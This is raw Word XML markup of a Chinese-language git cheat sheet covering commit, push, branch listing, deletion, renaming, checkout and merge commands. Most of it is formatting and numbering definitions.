          <w:numId w:val="12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it add file1 file2/git add .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRDefault="008730BB" w:rsidP="008730BB">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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it commit –m “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>说明性文字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRDefault="008730BB" w:rsidP="008730BB">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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git push origin  “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>主分支名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRPr="00113082" w:rsidRDefault="00113082" w:rsidP="00113082">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc108016897"/>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/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Pr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看本地分支：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git branch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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看远程分支：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git branch -r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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看本地和远程所有分支：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git branch -a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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>删除本地分支：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">git branch -D  </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支名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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>删除远程分支：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git branch origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支名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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支重命名：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  git branch  -m  </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>旧名</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113082" w:rsidRPr="00113082" w:rsidRDefault="00113082" w:rsidP="00113082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113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新建分支并跳跃去：</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">git checkout -b </w:t>
      </w:r>
      <w:r w:rsidR="0029260C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新</w:t>
      </w:r>
      <w:r w:rsidRPr="00113082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRPr="002C1AF1" w:rsidRDefault="002C1AF1" w:rsidP="002C1AF1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc108016898"/>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>整合分支：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="002C1AF1" w:rsidRP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2C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>首先由分支切换主支</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  git checkout master</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1AF1" w:rsidRP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2C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>更新仓库代码</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> git pull origin master</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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2C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>整合分支到主分支</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> git merge dev </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1AF1" w:rsidRPr="00107794" w:rsidRDefault="002C1AF1" w:rsidP="002C1AF1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑 Light" w:eastAsia="微软雅黑 Light" w:hAnsi="微软雅黑 Light" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc108016899"/>
      <w:r w:rsidRPr="00107794">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑 Light" w:eastAsia="微软雅黑 Light" w:hAnsi="微软雅黑 Light" w:cs="Microsoft New Tai Lue"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>other:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="002C1AF1" w:rsidRP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2C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">git checkout -b feature-branch </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>origin/feature-branch //</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检出远程的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>feature-branch</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支到本地</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1AF1" w:rsidRP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</w:p>
    <w:p w:rsidR="002C1AF1" w:rsidRPr="002C1AF1" w:rsidRDefault="002C1AF1" w:rsidP="002C1AF1">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>$ git push origin feature-branch:feature-branch //</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>推送本地的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>feature-branch(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>冒号前面的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支到远程</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>origin</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>feature-branch(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>冒号后面的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>没有会自动创建</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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8730BB" w:rsidRDefault="008730BB" w:rsidP="008730BB">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLin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35300D" w:rsidRDefault="0035300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p w:rsidR="0035300D" w:rsidRPr="00CB0A92" w:rsidRDefault="0035300D" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0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</w:p>
    <w:sectPr w:rsidR="0035300D" w:rsidRPr="00CB0A92" w:rsidSect="004F34C0">
      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
      <w:pgMar w:top="1800" w:right="1440" w:bottom="1800" w:left="1440" w:header="851" w:footer="992" w:gutter="0"/>
      <w:cols w:num="3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F4" w:rsidRDefault="001667F4" w:rsidP="00DC1244">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="001667F4" w:rsidRDefault="001667F4" w:rsidP="00DC1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F4" w:rsidRDefault="001667F4" w:rsidP="00DC1244">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="001667F4" w:rsidRDefault="001667F4" w:rsidP="00DC1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729"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0">
    <w:nsid w:val="029407A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABA2D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484995"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F79012E2"/>
    <w:lvl w:ilvl="0" w:tplc="31C47682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1" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="righ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9" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2931" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="righ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9" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4191" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4611" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="2B895BF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3C60E2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7A031A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05B67D00"/>
    <w:lvl w:ilvl="0" w:tplc="6AAE2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83B008C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="413C12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934BFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F3604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DD61ACF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34C6E01E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6A371CB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="999EA84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513D99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9941B40"/>
    <w:lvl w:ilvl="0" w:tplc="04090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-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31" w:hanging="47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244"/>
    <w:rsid w:val="00001D68"/>
    <w:rsid w:val="00021511"/>
    <w:rsid w:val="00023A40"/>
    <w:rsid w:val="000270E6"/>
    <w:rsid w:val="000300F8"/>
    <w:rsid w:val="00032425"/>
    <w:rsid w:val="00040138"/>
    <w:rsid w:val="00053022"/>
    <w:rsid w:val="00062BF6"/>
    <w:rsid w:val="000716A2"/>
    <w:rsid w:val="00071C50"/>
    <w:rsid w:val="00085A2A"/>
    <w:rsid w:val="00096FF2"/>
    <w:rsid w:val="000D70FB"/>
    <w:rsid w:val="000D7E08"/>
    <w:rsid w:val="00107794"/>
    <w:rsid w:val="001122A9"/>
    <w:rsid w:val="00113082"/>
    <w:rsid w:val="00133E44"/>
    <w:rsid w:val="00134E9B"/>
    <w:rsid w:val="001667F4"/>
    <w:rsid w:val="001826EA"/>
    <w:rsid w:val="001A65F5"/>
    <w:rsid w:val="001C3F8D"/>
    <w:rsid w:val="001D7858"/>
    <w:rsid w:val="001E55BC"/>
    <w:rsid w:val="001F66E8"/>
    <w:rsid w:val="00220EDA"/>
    <w:rsid w:val="00223BE4"/>
    <w:rsid w:val="0022728A"/>
    <w:rsid w:val="00256736"/>
    <w:rsid w:val="00256CC4"/>
    <w:rsid w:val="002720D8"/>
    <w:rsid w:val="0029260C"/>
    <w:rsid w:val="00294F83"/>
    <w:rsid w:val="00297A30"/>
    <w:rsid w:val="002A0881"/>
    <w:rsid w:val="002B35D0"/>
    <w:rsid w:val="002C1AF1"/>
    <w:rsid w:val="002F0E5A"/>
    <w:rsid w:val="002F54B6"/>
    <w:rsid w:val="00312019"/>
    <w:rsid w:val="00325CA6"/>
    <w:rsid w:val="0035300D"/>
    <w:rsid w:val="0035558D"/>
    <w:rsid w:val="00375972"/>
    <w:rsid w:val="00384840"/>
    <w:rsid w:val="00386D88"/>
    <w:rsid w:val="003B6B94"/>
    <w:rsid w:val="003C28A9"/>
    <w:rsid w:val="003D4A11"/>
    <w:rsid w:val="003E4147"/>
    <w:rsid w:val="003F087B"/>
    <w:rsid w:val="00401477"/>
    <w:rsid w:val="00417EA5"/>
    <w:rsid w:val="0044579F"/>
    <w:rsid w:val="0047211A"/>
    <w:rsid w:val="004844A0"/>
    <w:rsid w:val="00487868"/>
    <w:rsid w:val="004A5C7E"/>
    <w:rsid w:val="004B06DA"/>
    <w:rsid w:val="004B7A11"/>
    <w:rsid w:val="004D7E9F"/>
    <w:rsid w:val="004F34C0"/>
    <w:rsid w:val="004F7BFE"/>
    <w:rsid w:val="005007B1"/>
    <w:rsid w:val="00513A5A"/>
    <w:rsid w:val="00525D86"/>
    <w:rsid w:val="00537A93"/>
    <w:rsid w:val="00542E1A"/>
    <w:rsid w:val="00550773"/>
    <w:rsid w:val="0056462E"/>
    <w:rsid w:val="00566A91"/>
    <w:rsid w:val="005768AF"/>
    <w:rsid w:val="00580C11"/>
    <w:rsid w:val="00584162"/>
    <w:rsid w:val="00585DAF"/>
    <w:rsid w:val="005A353B"/>
    <w:rsid w:val="005B4768"/>
    <w:rsid w:val="005C2346"/>
    <w:rsid w:val="005C64F8"/>
    <w:rsid w:val="005D1B33"/>
    <w:rsid w:val="005E6110"/>
    <w:rsid w:val="006079B8"/>
    <w:rsid w:val="00620F87"/>
    <w:rsid w:val="006450EC"/>
    <w:rsid w:val="006657DB"/>
    <w:rsid w:val="00697AF8"/>
    <w:rsid w:val="006C636F"/>
    <w:rsid w:val="006D6EFE"/>
    <w:rsid w:val="00726583"/>
    <w:rsid w:val="00730260"/>
    <w:rsid w:val="007507A4"/>
    <w:rsid w:val="00757F88"/>
    <w:rsid w:val="007621D1"/>
    <w:rsid w:val="007648FF"/>
    <w:rsid w:val="007725D0"/>
    <w:rsid w:val="008536FC"/>
    <w:rsid w:val="008615C1"/>
    <w:rsid w:val="008671ED"/>
    <w:rsid w:val="008730BB"/>
    <w:rsid w:val="008755EE"/>
    <w:rsid w:val="00891039"/>
    <w:rsid w:val="00895DFB"/>
    <w:rsid w:val="008A4CC6"/>
    <w:rsid w:val="008B59E5"/>
    <w:rsid w:val="008C2E08"/>
    <w:rsid w:val="008D0886"/>
    <w:rsid w:val="008D762B"/>
    <w:rsid w:val="008E21AE"/>
    <w:rsid w:val="008E44F0"/>
    <w:rsid w:val="008F2595"/>
    <w:rsid w:val="009010AC"/>
    <w:rsid w:val="00905961"/>
    <w:rsid w:val="00905ACC"/>
    <w:rsid w:val="009349E3"/>
    <w:rsid w:val="00950149"/>
    <w:rsid w:val="00994501"/>
    <w:rsid w:val="009A00BA"/>
    <w:rsid w:val="009B086F"/>
    <w:rsid w:val="009B5358"/>
    <w:rsid w:val="009B6991"/>
    <w:rsid w:val="009C1410"/>
    <w:rsid w:val="009E36A3"/>
    <w:rsid w:val="00A53D85"/>
    <w:rsid w:val="00A55CDD"/>
    <w:rsid w:val="00A63AEC"/>
    <w:rsid w:val="00A65375"/>
    <w:rsid w:val="00A95BCA"/>
    <w:rsid w:val="00AC2C5B"/>
    <w:rsid w:val="00B22A5B"/>
    <w:rsid w:val="00B408C2"/>
    <w:rsid w:val="00B630D0"/>
    <w:rsid w:val="00B914F4"/>
    <w:rsid w:val="00BD7274"/>
    <w:rsid w:val="00BD785A"/>
    <w:rsid w:val="00BE2561"/>
    <w:rsid w:val="00C3278B"/>
    <w:rsid w:val="00C531FA"/>
    <w:rsid w:val="00C600E7"/>
    <w:rsid w:val="00C82AEA"/>
    <w:rsid w:val="00CA209B"/>
    <w:rsid w:val="00CB0A92"/>
    <w:rsid w:val="00CE0EE4"/>
    <w:rsid w:val="00CE14CA"/>
    <w:rsid w:val="00CE2738"/>
    <w:rsid w:val="00CE506B"/>
    <w:rsid w:val="00CF7F3A"/>
    <w:rsid w:val="00D02B1D"/>
    <w:rsid w:val="00D045CE"/>
    <w:rsid w:val="00D243BA"/>
    <w:rsid w:val="00D3342E"/>
    <w:rsid w:val="00D401E8"/>
    <w:rsid w:val="00D62170"/>
    <w:rsid w:val="00D63FDD"/>
    <w:rsid w:val="00D93E45"/>
    <w:rsid w:val="00D9410F"/>
    <w:rsid w:val="00DA5912"/>
    <w:rsid w:val="00DC057B"/>
    <w:rsid w:val="00DC1244"/>
    <w:rsid w:val="00DC7A8C"/>
    <w:rsid w:val="00DD79F0"/>
    <w:rsid w:val="00DE415B"/>
    <w:rsid w:val="00DE75D7"/>
    <w:rsid w:val="00DF5CD4"/>
    <w:rsid w:val="00E01083"/>
    <w:rsid w:val="00E10A4D"/>
    <w:rsid w:val="00E12444"/>
    <w:rsid w:val="00E134E6"/>
    <w:rsid w:val="00E32149"/>
    <w:rsid w:val="00E35094"/>
    <w:rsid w:val="00E846E0"/>
    <w:rsid w:val="00E912DF"/>
    <w:rsid w:val="00EB1A46"/>
    <w:rsid w:val="00EB4B67"/>
    <w:rsid w:val="00EC1E17"/>
    <w:rsid w:val="00EC7383"/>
    <w:rsid w:val="00F03310"/>
    <w:rsid w:val="00F12D8D"/>
    <w:rsid w:val="00F21788"/>
    <w:rsid w:val="00F25F92"/>
    <w:rsid w:val="00F30DE4"/>
    <w:rsid w:val="00F33D70"/>
    <w:rsid w:val="00F53D1F"/>
    <w:rsid w:val="00F56AF5"/>
    <w:rsid w:val="00F65FED"/>
    <w:rsid w:val="00F907BE"/>
    <w:rsid w:val="00F90ADD"/>
    <w:rsid w:val="00F94E9A"/>
    <w:rsid w:val="00FA17FC"/>
    <w:rsid w:val="00FA2C91"/>
    <w:rsid w:val="00FA4A74"/>
    <w:rsid w:val="00FB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YaHei Mono" w:eastAsia="宋体" w:hAnsi="Microsoft YaHei Mono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73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1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12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1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1244"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00DC124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44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44F0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="No Spacing"/>
    <w:link w:val="Char2"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00620F87"/>
    <w:rPr>
